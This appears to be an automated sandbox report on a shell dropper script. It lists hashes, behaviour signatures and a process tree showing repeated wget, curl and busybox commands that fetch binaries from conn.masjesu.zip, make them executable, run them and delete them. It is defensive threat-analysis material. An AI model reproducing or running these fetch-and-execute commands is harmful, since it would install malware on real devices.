Analysis
- max time kernel: 149s
- max time network: 63s
- platform: debian-9_mipsel
- resource: debian9-mipsel-20240611-en
- resource tags: arch:mipsel, image:debian9-mipsel-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
- submitted: 28/10/2024, 02:22
Tasks
- Static task static1
- Behavioral task behavioral1: Sample 376053c6de63b75df1b5fda98e44fcf278b064c54f3fbb009df4e8c5d1fbc36e.sh, Resource ubuntu1804-amd64-20240611-en
- Behavioral task behavioral2: Sample 376053c6de63b75df1b5fda98e44fcf278b064c54f3fbb009df4e8c5d1fbc36e.sh, Resource debian9-armhf-20240611-en
- Behavioral task behavioral3: Sample 376053c6de63b75df1b5fda98e44fcf278b064c54f3fbb009df4e8c5d1fbc36e.sh, Resource debian9-mipsbe-20240611-en
- Behavioral task behavioral4: Sample 376053c6de63b75df1b5fda98e44fcf278b064c54f3fbb009df4e8c5d1fbc36e.sh, Resource debian9-mipsel-20240611-en
General
- Target: 376053c6de63b75df1b5fda98e44fcf278b064c54f3fbb009df4e8c5d1fbc36e.sh
- Size: 10KB
- MD5: 9b934eb9471f7b80ea070ae4feb86150
- SHA1: 9303ecd0d513c8024a554bf860d73fe5f98cce23
- SHA256: 376053c6de63b75df1b5fda98e44fcf278b064c54f3fbb009df4e8c5d1fbc36e
- SHA512: e8b3fe4c18b161c588b07657e1609be4c3ad94a1fced10b0c828730ffb4079962bb6d7a1067c57666d9bcab83cbb6795e263783c41f9ab8aecca55f2f6ea4c83
- SSDEEP: 96:YrHTrLtXVtIgNNNNNSVBxLQMs1VZ1Vx1VAVhVlV4/T8hZcL3LlLCakqz6LUY7tNN:k2y1pifn2FXeDiY1pifn23
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 19 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 19 IoCs
Reads runtime system information
File opened for reading: /proc/sys/crypto/fips_enabled (process: curl)
System Network Configuration Discovery 1 TTPs 59 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 19 IoCs
Malware often drops required files in the /tmp directory.
Processes
Columns: PID | image path | command line | signatures. Indented entries are children of PID 703.
- PID 703 | /tmp/376053c6de63b75df1b5fda98e44fcf278b064c54f3fbb009df4e8c5d1fbc36e.sh | /tmp/376053c6de63b75df1b5fda98e44fcf278b064c54f3fbb009df4e8c5d1fbc36e.sh
  - PID 705 | /bin/rm | /bin/rm bins.sh
  - PID 707 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP | System Network Configuration Discovery
  - PID 724 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP | Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory
  - PID 735 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP | System Network Configuration Discovery
  - PID 736 | /bin/chmod | chmod 777 hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP | File and Directory Permissions Modification
  - PID 737 | /tmp/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP | ./hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP | Executes dropped EXE
  - PID 738 | /bin/rm | rm hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP
  - PID 739 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO | System Network Configuration Discovery
  - PID 740 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO | Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory
  - PID 742 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO | System Network Configuration Discovery
  - PID 743 | /bin/chmod | chmod 777 YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO | File and Directory Permissions Modification
  - PID 744 | /tmp/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO | ./YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO | Executes dropped EXE
  - PID 745 | /bin/rm | rm YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO
  - PID 746 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo | System Network Configuration Discovery
  - PID 747 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo | Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory
  - PID 749 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo | System Network Configuration Discovery
  - PID 752 | /bin/chmod | chmod 777 GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo | File and Directory Permissions Modification
  - PID 753 | /tmp/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo | ./GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo | Executes dropped EXE
  - PID 756 | /bin/rm | rm GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo
  - PID 757 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r | System Network Configuration Discovery
  - PID 768 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r | Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory
  - PID 775 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r | System Network Configuration Discovery
  - PID 781 | /bin/chmod | chmod 777 TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r | File and Directory Permissions Modification
  - PID 782 | /tmp/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r | ./TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r | Executes dropped EXE
  - PID 785 | /bin/rm | rm TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r
  - PID 786 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh | System Network Configuration Discovery
  - PID 799 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh | Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory
  - PID 806 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh | System Network Configuration Discovery
  - PID 809 | /bin/chmod | chmod 777 BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh | File and Directory Permissions Modification
  - PID 810 | /tmp/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh | ./BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh | Executes dropped EXE
  - PID 811 | /bin/rm | rm BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh
  - PID 812 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa2 | System Network Configuration Discovery
  - PID 813 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa2 | Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory
  - PID 815 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa2 | System Network Configuration Discovery
  - PID 816 | /bin/chmod | chmod 777 8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa2 | File and Directory Permissions Modification
  - PID 817 | /tmp/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa2 | ./8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa2 | Executes dropped EXE
  - PID 818 | /bin/rm | rm 8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa2
  - PID 819 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu | System Network Configuration Discovery
  - PID 820 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu | Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory
  - PID 825 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu | System Network Configuration Discovery
  - PID 826 | /bin/chmod | chmod 777 ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu | File and Directory Permissions Modification
  - PID 827 | /tmp/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu | ./ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu | Executes dropped EXE
  - PID 828 | /bin/rm | rm ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu
  - PID 829 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo | System Network Configuration Discovery
  - PID 830 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo | Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory
  - PID 838 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo | System Network Configuration Discovery
  - PID 847 | /bin/chmod | chmod 777 TtiH17uSRwU8OtuZzPC189hS1401xDLvpo | File and Directory Permissions Modification
  - PID 848 | /tmp/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo | ./TtiH17uSRwU8OtuZzPC189hS1401xDLvpo | Executes dropped EXE
  - PID 851 | /bin/rm | rm TtiH17uSRwU8OtuZzPC189hS1401xDLvpo
  - PID 852 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O | System Network Configuration Discovery
  - PID 867 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O | Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory
  - PID 869 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O | System Network Configuration Discovery
  - PID 870 | /bin/chmod | chmod 777 nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O | File and Directory Permissions Modification
  - PID 871 | /tmp/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O | ./nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O | Executes dropped EXE
  - PID 872 | /bin/rm | rm nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O
  - PID 873 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo | System Network Configuration Discovery
  - PID 874 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo | Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory
  - PID 876 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo | System Network Configuration Discovery
  - PID 877 | /bin/chmod | chmod 777 78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo | File and Directory Permissions Modification
  - PID 878 | /tmp/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo | ./78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo | Executes dropped EXE
  - PID 879 | /bin/rm | rm 78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo
  - PID 880 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh | System Network Configuration Discovery
  - PID 881 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh | Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory
  - PID 883 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh | System Network Configuration Discovery
  - PID 884 | /bin/chmod | chmod 777 nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh | File and Directory Permissions Modification
  - PID 885 | /tmp/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh | ./nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh | Executes dropped EXE
  - PID 886 | /bin/rm | rm nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh
  - PID 887 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD5 | System Network Configuration Discovery
  - PID 888 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD5 | Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory
  - PID 890 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD5 | System Network Configuration Discovery
  - PID 891 | /bin/chmod | chmod 777 nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD5 | File and Directory Permissions Modification
  - PID 892 | /tmp/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD5 | ./nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD5 | Executes dropped EXE
  - PID 893 | /bin/rm | rm nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD5
  - PID 894 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq | System Network Configuration Discovery
  - PID 895 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq | Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory
  - PID 897 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq | System Network Configuration Discovery
  - PID 898 | /bin/chmod | chmod 777 JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq | File and Directory Permissions Modification
  - PID 899 | /tmp/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq | ./JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq | Executes dropped EXE
  - PID 900 | /bin/rm | rm JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq
  - PID 901 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H | System Network Configuration Discovery
  - PID 902 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H | Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory
  - PID 904 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H | System Network Configuration Discovery
  - PID 905 | /bin/chmod | chmod 777 T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H | File and Directory Permissions Modification
  - PID 906 | /tmp/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H | ./T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H | Executes dropped EXE
  - PID 907 | /bin/rm | rm T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H
  - PID 908 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa2 | System Network Configuration Discovery
  - PID 909 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa2 | Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory
  - PID 911 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa2 | System Network Configuration Discovery
  - PID 912 | /bin/chmod | chmod 777 8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa2 | File and Directory Permissions Modification
  - PID 913 | /tmp/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa2 | ./8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa2 | Executes dropped EXE
  - PID 914 | /bin/rm | rm 8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa2
  - PID 915 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu | System Network Configuration Discovery
  - PID 916 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu | Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory
  - PID 918 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu | System Network Configuration Discovery
  - PID 919 | /bin/chmod | chmod 777 ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu | File and Directory Permissions Modification
  - PID 920 | /tmp/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu | ./ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu | Executes dropped EXE
  - PID 921 | /bin/rm | rm ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu
  - PID 922 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo | System Network Configuration Discovery
  - PID 923 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo | Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory
  - PID 925 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo | System Network Configuration Discovery
  - PID 926 | /bin/chmod | chmod 777 TtiH17uSRwU8OtuZzPC189hS1401xDLvpo | File and Directory Permissions Modification
  - PID 927 | /tmp/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo | ./TtiH17uSRwU8OtuZzPC189hS1401xDLvpo | Executes dropped EXE
  - PID 928 | /bin/rm | rm TtiH17uSRwU8OtuZzPC189hS1401xDLvpo
  - PID 929 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O | System Network Configuration Discovery
  - PID 930 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O | Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory
  - PID 932 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O | System Network Configuration Discovery
  - PID 933 | /bin/chmod | chmod 777 nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O | File and Directory Permissions Modification
  - PID 934 | /tmp/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O | ./nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O | Executes dropped EXE
  - PID 935 | /bin/rm | rm nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O
  - PID 936 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo | System Network Configuration Discovery
  - PID 937 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo | Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory
  - PID 939 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo | System Network Configuration Discovery
  - PID 940 | /bin/chmod | chmod 777 GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo | File and Directory Permissions Modification
  - PID 941 | /tmp/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo | ./GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo | Executes dropped EXE
  - PID 942 | /bin/rm | rm GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo
  - PID 943 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r | System Network Configuration Discovery
  - PID 944 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r | Reads runtime system information; System Network Configuration Discovery
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 153B
- MD5: 998368d7c95ea4293237f2320546e440
- SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
- SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
- SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97